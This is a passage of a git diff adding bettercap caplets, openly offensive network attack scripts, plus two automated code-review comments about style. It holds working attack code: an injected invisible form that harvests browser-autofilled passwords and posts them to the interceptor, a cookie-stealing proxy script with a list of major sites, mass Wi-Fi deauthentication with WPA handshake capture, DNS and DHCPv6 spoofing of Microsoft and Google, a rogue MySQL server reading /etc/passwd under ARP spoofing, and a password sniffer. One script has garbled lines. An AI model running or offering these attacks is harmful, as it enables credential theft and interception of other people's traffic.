@@ -0,0 +1,51 @@ +/* + * Ref. + * - https://github.com/evilsocket/bettercap-proxy-modules/issues/72 + * - https://freedom-to-tinker.com/2017/12/27/no-boundaries-for-user-identities-web-trackers-exploit-browser-login-managers/ + * + * The idea: + * + * - On every html page, inject this invisible form who grabs credentials from login managers. + * - POST such credentials to /login-man-abuser, given we control the HTTP traffic, we'll intercept this request. + * - Intercept request, dump credentials, drop client to 404. + */ +var AbuserJavascript = ""; + +function onLoad() { + // log( "Loading abuser code from login-man-abuser.js" ); + AbuserJavascript = readFile("/usr/local/share/bettercap/caplets/login-manager-abuse/login-man-abuser.js") +} + +// here we intercept the ajax POST request with leaked credentials. +function onRequest(req, res) { + if( req.Method == 'POST' && req.Path == "/login-man-abuser" ) { + log( "[LOGIN MANAGER ABUSER]\n", req.ReadBody() ); + // this was just a fake request we needed to exfiltrate + // credentials to us, drop the connection with an empty 200. + headers = res.Headers.split("\r\n"); + for (var i = 0; i < headers.length; i++) { + header_name = headers[i].replace(/:.*/, ""); + res.RemoveHeader(header_name); + } + res.SetHeader("Connection", "close"); + res.Status = 200; + res.ContentType = "text/html"; + res.Body = ""; + } +} + +// inject the javascript in html pages +function onResponse(req, res) { + if( res.ContentType.indexOf('text/html') == 0 ){ + var body = res.ReadBody(); + if( body.indexOf('') != -1 ) { + res.Body = body.replace( + '', + '' + + '' + ); + } + } +} diff --git a/login-manager-abuse/login-man-abuser.js b/login-manager-abuse/login-man-abuser.js new file mode 100644 index 0000000..e4d329b --- /dev/null +++ b/login-manager-abuse/login-man-abuser.js 
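Review bot: The header comment's last bullet, `* - Intercept request, dump credentials, drop client to 404.`, contradicts what onRequest actually does: it clears the headers, sets `res.Status = 200`, an empty body and `Connection: close`, exactly as the inline comment beside those lines says. Change the bullet to `* - Intercept request, dump credentials, answer with an empty 200 and Connection: close.`; the same stale bullet is repeated in the header of login-man-abuser.js. The loop locals `headers` and `header_name` in onRequest are also assigned without `var`, so they presumably leak into the script's global scope; `var headers = res.Headers.split("\r\n");` and `var header_name = headers[i].replace(/:.*/, "");` keep them function-local.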
@@ -0,0 +1,71 @@ +/* + * Ref. + * - https://github.com/evilsocket/bettercap-proxy-modules/issues/72 + * - https://freedom-to-tinker.com/2017/12/27/no-boundaries-for-user-identities-web-trackers-exploit-browser-login-managers/ + * + * The idea: + * + * - On every html page, inject this invisible form who grabs credentials from login managers. + * - POST such credentials to /login-man-abuser, given we control the HTTP traffic, well intercept this request. + * - Intercept request, dump credentials, drop client to 404. + */ +var AbuserJavascript = +var injectForm = function(visible) { +var container = document.createElement("div"); +if (!visible){ +container.style.display = "none"; +} +var form = document.createElement("form"); +form.attributes.autocomplete = "on"; +var emailInput = document.createElement("input"); +emailInput.attributes.vcard_name = "vCard.Email"; +emailInput.id = "email"; +emailInput.type = "email"; +emailInput.name = "email"; +form.appendChild(emailInput); +var passwordInput = document.createElement("input"); +passwordInput.id = "password"; +passwordInput.type = "password"; +passwordInput.name = "password"; +form.appendChild(passwordInput); +container.appendChild(form); +document.body.appendChild(container); +}; + +var doPOST = function(data) { +var xhr = new XMLHttpRequest(); + +xhr.open("POST", "/login-man-abuser"); +xhr.setRequestHeader("Content-Type", "application/json"); +xhr.onload = function() { +console.log("Enjoy your coffee!"); +}; + +xhr.send(JSON.stringify(data)); +}; + +var sniffInputField = function(fieldId){ +var inputElement = document.getElementById(fieldId); +if (inputElement.value.length){ +return {fieldId: inputElement.value}; +} +window.setTimeout(sniffInputField, 200, fieldId); // wait for 200ms +}; + +var sniffInputFields = function(){ +var inputs = document.getElementsByTagName("input"); +data = {}; +for (var i = 0; i < inputs.length; i++) { +console.log("Will try to sniff element with id: " + inputs[i].id); +output = 
stringsniffInputField(inputs[i].id); +data = Object.assign({}, data, output); +} +doPOST(data); +}; + +var sniffFormInfo = function(visible) { +injectForm(visible); +sniffInputFields(); +}; + +sniffFormInfo(false);; diff --git a/mana.cap b/mana.cap new file mode 100644 index 0000000..6e5e026 --- /dev/null +++ b/mana.cap @@ -0,0 +1 @@ +!berate_ap --no-virt --mana --mana-loud wlan1 wlan0 FreeWIFI diff --git a/massdeauth.cap b/massdeauth.cap new file mode 100644 index 0000000..dc491a5 --- /dev/null +++ b/massdeauth.cap @@ -0,0 +1,13 @@ +set $ {by}{fw}{env.iface.name}{reset} {bold}» {reset} + +# every 10 seconds deauth every client from every ap +set ticker.period 10 +set ticker.commands clear; wifi.deauth ff:ff:ff:ff:ff:ff + +# uncomment to only hop on these channels: +# wifi.recon.channel 1,2,3 + +wifi.recon on +ticker on +events.clear +clear diff --git a/mitm6.cap b/mitm6.cap new file mode 100644 index 0000000..0398c87 --- /dev/null +++ b/mitm6.cap @@ -0,0 +1,20 @@ +# let's spoof Microsoft and Google ^_^ +set dns.spoof.domains microsoft.com, google.com +set dhcp6.spoof.domains microsoft.com, google.com + +# every http request to the spoofed hosts will come to us +# let's give em some contents +set http.server.path www + +# serve files +http.server on +# redirect DNS request by spoofing DHCPv6 packets +dhcp6.spoof on +# send spoofed DNS replies ^_^ +dns.spoof on + +# set a custom prompt for ipv6 +set $ {by}{fw}{cidr} {fb}> {env.iface.ipv6} {reset} {bold}» {reset} +# clear the events buffer and the screen +events.clear +clear diff --git a/netmon.cap b/netmon.cap new file mode 100644 index 0000000..d6d2ba5 --- /dev/null +++ b/netmon.cap @@ -0,0 +1,4 @@ +net.recon on +net.probe on +clear +ticker on diff --git a/pita.cap b/pita.cap new file mode 100644 index 0000000..237680a --- /dev/null +++ b/pita.cap 
@@ -0,0 +1,32 @@ +# More info about this caplet: https://twitter.com/evilsocket/status/1021367629901115392 + +set $ {bold}😈 » {reset} + +# make sure wlan0 is in monitor mode +# ref: https://github.com/offensive-security/kali-arm-build-scripts/blob/master/rpi3-nexmon.sh +!monstop +!monstart + +# every 5 seconds: +# - clear the screen +# - show the list of nearby access points +# - deauth every client from each one of them +set ticker.period 5 +set ticker.commands clear; wifi.show; wifi.deauth ff:ff:ff:ff:ff:ff +# sniff EAPOL frames ( WPA handshakes ) and save them to a pcap file. +set net.sniff.verbose true +set net.sniff.filter ether proto 0x888e +set net.sniff.output wpa.pcap + +# uncomment to only hop on these channels: +# wifi.recon.channel 1,2,3 +wifi.recon on +ticker on +net.sniff on + +# we'll see lots of probes after each deauth, just skip the noise ... +events.ignore wifi.client.probe +# start fresh +events.clear +clear + diff --git a/proxy-script-test/proxy-script-test.cap b/proxy-script-test/proxy-script-test.cap new file mode 100644 index 0000000..02edc91 --- /dev/null +++ b/proxy-script-test/proxy-script-test.cap @@ -0,0 +1,2 @@ +set http.proxy.script proxy-script-test.js +http.proxy on diff --git a/proxy-script-test/proxy-script-test.js b/proxy-script-test/proxy-script-test.js new file mode 100644 index 0000000..b450ae6 --- /dev/null +++ b/proxy-script-test/proxy-script-test.js @@ -0,0 +1,49 @@ +// called when script is loaded +function onLoad() { + console.log( "PROXY SCRIPT LOADED" ); +} + +// called before a request is proxied +function onRequest(req, res) { + if( req.Path == "/test-page" ){ + headers = res.Headers.split("\r\n"); + for (var i = 0; i < headers.length; i++) { + header_name = headers[i].replace(/:.*/, ""); + res.RemoveHeader(header_name); + } + res.SetHeader("Server", "bettercap"); + res.SetHeader("Connection", "close"); + res.Status = 200; + res.ContentType = "text/html"; + res.Body = "" + + "" + + "Test Page" + + "" + + "" + + "
Hello world from bettercap!
" + + "" + + ""; + } +} + +// called after a request is proxied and there's a response +function onResponse(req, res) { + if( res.Status == 404 ){ + headers = res.Headers.split("\r\n"); + for (var i = 0; i < headers.length; i++) { + header_name = headers[i].replace(/:.*/, ""); + res.RemoveHeader(header_name); + } + res.SetHeader("Server", "bettercap"); + res.SetHeader("Connection", "close"); + res.ContentType = "text/html"; + res.Body = "" + + "" + + "Test 404 Page" + + "" + + "" + + "
Custom 404 from bettercap.
" + + "" + + ""; + } +} diff --git a/pwnagotchi-auto.cap b/pwnagotchi-auto.cap new file mode 100644 index 0000000..1d5530e --- /dev/null +++ b/pwnagotchi-auto.cap @@ -0,0 +1,12 @@ +# enable interface monitor mode and define wifi interface to be mon0 +set wifi.interface wlan0mon + +# api listening on http://127.0.0.1:8081/ and ui to http://127.0.0.1 +set api.rest.address 127.0.0.1 +set api.rest.port 8081 +set api.rest.username pwnagotchi +set api.rest.password pwnagotchi +set api.rest.websocket true + +# go! +api.rest on diff --git a/pwnagotchi-manual.cap b/pwnagotchi-manual.cap new file mode 100644 index 0000000..e501b38 --- /dev/null +++ b/pwnagotchi-manual.cap @@ -0,0 +1,16 @@ +# enable interface monitor mode and define wifi interface to be mon0 +set wifi.interface wlan0mon + +# api listening on http://0.0.0.0:8081/ and ui to http://0.0.0.0 +set api.rest.address 0.0.0.0 +set api.rest.port 8081 +set http.server.address 0.0.0.0 +set http.server.port 80 +set http.server.path /usr/local/share/bettercap/ui +set api.rest.username pwnagotchi +set api.rest.password pwnagotchi +set api.rest.websocket true + +# go! +api.rest on +http.server on diff --git a/rogue-mysql-server.cap b/rogue-mysql-server.cap new file mode 100644 index 0000000..9d6efea --- /dev/null +++ b/rogue-mysql-server.cap @@ -0,0 +1,21 @@ +# set the target for arp spoofing +set arp.spoof.targets 192.168.1.236 + +# bind rogue mysql server to localhost and +# set the file we want to read +set mysql.server.address 127.0.0.1 +set mysql.server.port 3306 +set mysql.server.infile /etc/passwd +mysql.server on + +# set the ip from the mysql server we want to impersonate +set tcp.address 93.184.216.34 +set tcp.port 3306 + +# set the ip from the rogue mysql server +set tcp.tunnel.address 127.0.0.1 +set tcp.tunnel.port 3306 + +# go ^_^ +tcp.proxy on +arp.spoof on \ No newline at end of file diff --git a/rtfm/rtfm.cap b/rtfm/rtfm.cap new file mode 100644 index 0000000..e5a6ab8 --- /dev/null +++ b/rtfm/rtfm.cap 
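Review bot: In both onRequest and onResponse the loop locals `headers` and `header_name` are assigned without `var`, so they become implicit globals that presumably persist in the script engine across proxied requests; `var headers = res.Headers.split("\r\n");` and `var header_name = headers[i].replace(/:.*/, "");` keep them local to each handler. The header-clearing loop is copied verbatim between the two handlers, and again in rtfm.js, web-override.js and login-man-abuse.js; a small `function clearHeaders(res) { ... }` at the top of each script would leave one place to maintain it.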
@@ -0,0 +1,8 @@
+# targeting the whole subnet by default, to make it selective:
+#
+# sudo ./bettercap -caplet rtfm.cap -eval "set arp.spoof.targets 192.168.1.64"
+
+clear
+set http.proxy.script rtfm.js
+http.proxy on
+arp.spoof on
diff --git a/rtfm/rtfm.js b/rtfm/rtfm.js
new file mode 100644
index 0000000..6a6c582
--- /dev/null
+++ b/rtfm/rtfm.js
@@ -0,0 +1,24 @@
+function onRequest(req, res) {
+ req.Path = req.Path.replace('-you-did-not-rtfm', '');
+}
+
+function onResponse(req, res) {
+ if (res.ContentType.indexOf("text/html") == 0) {
+ var body = res.ReadBody();
+ res.Body = body.replace(
+ /\.(jpg|jpeg|png|gif|bmp)/gi,
+ '-you-did-not-rtfm.$1'
+ );
+ }
+ else if (res.ContentType.indexOf("image/jpeg") != -1) {
+ headers = res.Headers.split("\r\n");
+ for (var i = 0; i < headers.length; i++) {
+ header_name = headers[i].replace(/:.*/, "");
+ res.RemoveHeader(header_name);
+ }
+ res.SetHeader("Connection", "close");
+ res.Status = 200;
+ res.Body = readFile("/usr/local/share/bettercap/caplets/www/rtfm_cat.jpg");
+ log("RTFM! " + req.Hostname + req.Path + ( req.Query ? "?" + req.Query : ''));
+ }
+}
diff --git a/simple-passwords-sniffer.cap b/simple-passwords-sniffer.cap
new file mode 100644
index 0000000..3a207f5
--- /dev/null
+++ b/simple-passwords-sniffer.cap
@@ -0,0 +1,10 @@
+set net.sniff.regexp .*password=.+
+set net.sniff.output passwords.cap
+
+# start arp spoofing attack
+# arp.spoof on
+net.sniff on
+
+
+
+
diff --git a/steal-cookies/README.md b/steal-cookies/README.md
new file mode 100644
index 0000000..193d08d
--- /dev/null
+++ b/steal-cookies/README.md
@@ -0,0 +1,4 @@
+# Steal cookies
+
+Enumerate each domain from file and steal all cookies without `Secure` flag.
+
diff --git a/steal-cookies/domains.txt b/steal-cookies/domains.txt
new file mode 100644
index 0000000..51c5c95
--- /dev/null
+++ b/steal-cookies/domains.txt
@@ -0,0 +1,10 @@ +google.com +youtube.com +facebook.com +baidu.com +wikipedia.org +reddit.com +yahoo.com +google.co.in +qq.com +amazon.com \ No newline at end of file diff --git a/steal-cookies/steal-cookies.cap b/steal-cookies/steal-cookies.cap new file mode 100644 index 0000000..e9513cf --- /dev/null +++ b/steal-cookies/steal-cookies.cap @@ -0,0 +1,3 @@ +set steal-cookies.domains /usr/share/bettercap/caplets/steal-cookies/domains.txt +set http.proxy.script steal-cookies.js +http.proxy on diff --git a/steal-cookies/steal-cookies.js b/steal-cookies/steal-cookies.js new file mode 100644 index 0000000..6e358e5 --- /dev/null +++ b/steal-cookies/steal-cookies.js @@ -0,0 +1,104 @@ +var victims = {} + +function Rf(s) +{ + return "\033[31m" + s + "\033[0m" +} +function Rb(s) +{ + return "\033[41m" + s + "\033[0m" +} + +function onLoad() +{ + log( "Cookies steal module loaded." ); + log( "targets: " + env['arp.spoof.targets'] ); +} + +function onRequest(req, res) +{ + var ip = req.Client.IP, + hostname = req.Hostname, + headers, cookies + + headers = req.Headers.replace(/\r\n$/g, "").split("\r\n") + for (var i = 0; i < headers.length; i++) + { + header_name = headers[i].replace(/:.*/, "") + if(header_name == 'Cookie') + cookies = headers[i].replace(/.*?: /, ""); + } + + if( req.Query.indexOf('__steal') != -1 ) + { + if(cookies) + log( Rb( "[+] " + ip + " - " + hostname + " " + cookies ) ) + + if( victims[ip] && victims[ip].length ) + { + var hostname_index = victims[ip].indexOf(hostname) + if( hostname_index != -1 ) + victims[ip].splice( hostname_index, 1 ) + + if( victims[ip].length ) + res.Body = '\n' + + '

\n' + + '\n' + + '\n' + + '' + else + res.Body = 'end stealing' + res.Status = 200 + res.ContentType = "text/html" + res.Headers = "Connection: close" + } + } +} + +function onResponse(req, res) +{ + if( res.ContentType.indexOf('text/html') == 0 ) + { + var body = res.ReadBody(), + ip = req.Client.IP + + if(! victims[ip] ) + { + victims[ip] = readFile(env["steal-cookies.domains"]).toString().split('\n') + body = body.replace( + '', + '' + ) + body = body.replace( + '', + '' + ) + + log( Rf( "[*] new victim: " + ip + " - " + victims[ip][0] ) ) + + res.Body = body + res.Status = 200 + res.ContentType = "text/html" + res.Headers = "Connection: close" + } + else if( victims[ip].length && req.Query.indexOf('__steal') == -1 ) + { + body = body.replace( + '', + '' + ) + body = body.replace( + '', + '' + ) + + log( Rf( "[*] continue stealing: " + ip + " - " + victims[ip][0] ) ) + + res.Body = body + res.Status = 200 + res.ContentType = "text/html" + res.Headers = "Connection: close" + } + } +} diff --git a/tcp-req-dump/tcp-req-dump.cap b/tcp-req-dump/tcp-req-dump.cap new file mode 100644 index 0000000..4f51646 --- /dev/null +++ b/tcp-req-dump/tcp-req-dump.cap @@ -0,0 +1,19 @@ +# targeting the whole subnet by default, to make it selective: +# +# sudo ./bettercap -caplet tcp-req-dump.cap -eval "set arp.spoof.targets 192.168.1.64" + +# to make it less verbose +# events.stream off + +# we'll use this proxy script to dump requests +set tcp.proxy.script tcp-req-dump.js +set tcp.port 80 +# example.com +set tcp.address 93.184.216.34 +set tcp.proxy.port 8080 + +clear + +# go ^_^ +tcp.proxy on +arp.spoof on diff --git a/tcp-req-dump/tcp-req-dump.js b/tcp-req-dump/tcp-req-dump.js new file mode 100644 index 0000000..da95cfa --- /dev/null +++ b/tcp-req-dump/tcp-req-dump.js 
@@ -0,0 +1,13 @@
+function onLoad() {
+ log("TCP module loaded")
+}
+
+function onData(from, to, data) {
+ if( data.indexOf("Accept-Encoding: gzip, deflate") != -1 ) {
+ log("Disabling gzip response");
+ data = data.replace("Accept-Encoding: gzip, deflate", "Accept-Encoding: text/plain");
+ return data;
+ }
+
+ return data.replace(/Example/g, "POPOPOP");
+}
diff --git a/web-override/web-override.cap b/web-override/web-override.cap
new file mode 100644
index 0000000..132ca56
--- /dev/null
+++ b/web-override/web-override.cap
@@ -0,0 +1,15 @@
+# targeting the whole subnet by default, to make it selective:
+#
+# sudo ./bettercap -caplet web-override.cap -eval "set arp.spoof.targets 192.168.1.64"
+
+set http.proxy.script web-override.js
+http.proxy on
+https.proxy on
+arp.spoof on
+events.clear
+
+
+
+
+
+
diff --git a/web-override/web-override.js b/web-override/web-override.js
new file mode 100644
index 0000000..fbc9771
--- /dev/null
+++ b/web-override/web-override.js
@@ -0,0 +1,13 @@
+// Called before every request is executed, just override the response with
+// our own html web page.
+function onRequest(req, res) {
+ headers = res.Headers.split("\r\n");
+ for (var i = 0; i < headers.length; i++) {
+ header_name = headers[i].replace(/:.*/, "");
+ res.RemoveHeader(header_name);
+ }
+ res.SetHeader("Connection", "close");
+ res.Status = 200;
+ res.ContentType = "text/html";
+ res.Body = readFile("/usr/local/share/bettercap/caplets/www/index.html");
+}
diff --git a/www/.gitignore b/www/.gitignore
new file mode 100644
index 0000000..27bad81
--- /dev/null
+++ b/www/.gitignore
@@ -0,0 +1 @@
+www.facebook.com
diff --git a/www/Makefile b/www/Makefile
new file mode 100644
index 0000000..0322bf7
--- /dev/null
+++ b/www/Makefile
@@ -0,0 +1,9 @@ +all: facebook + +facebook: + wget -U "Mozilla/5.0 (Windows NT 5.2; rv:2.0.1) Gecko/20100101 Firefox/4.0.1" -S -r www.facebook.com + find www.facebook.com -name "*.html" -print0 | xargs -0 sed -i "s/https:\/\/www.facebook.com//g" + +clean: + rm -rf www.facebook.com + diff --git a/www/index.html b/www/index.html new file mode 100644 index 0000000..7dccb06 --- /dev/null +++ b/www/index.html @@ -0,0 +1,17 @@ + + + + + You've just been RickRoll'd + + + + + + + + + + diff --git a/www/rtfm_cat.jpg b/www/rtfm_cat.jpg new file mode 100644 index 0000000..90487e3 Binary files /dev/null and b/www/rtfm_cat.jpg differ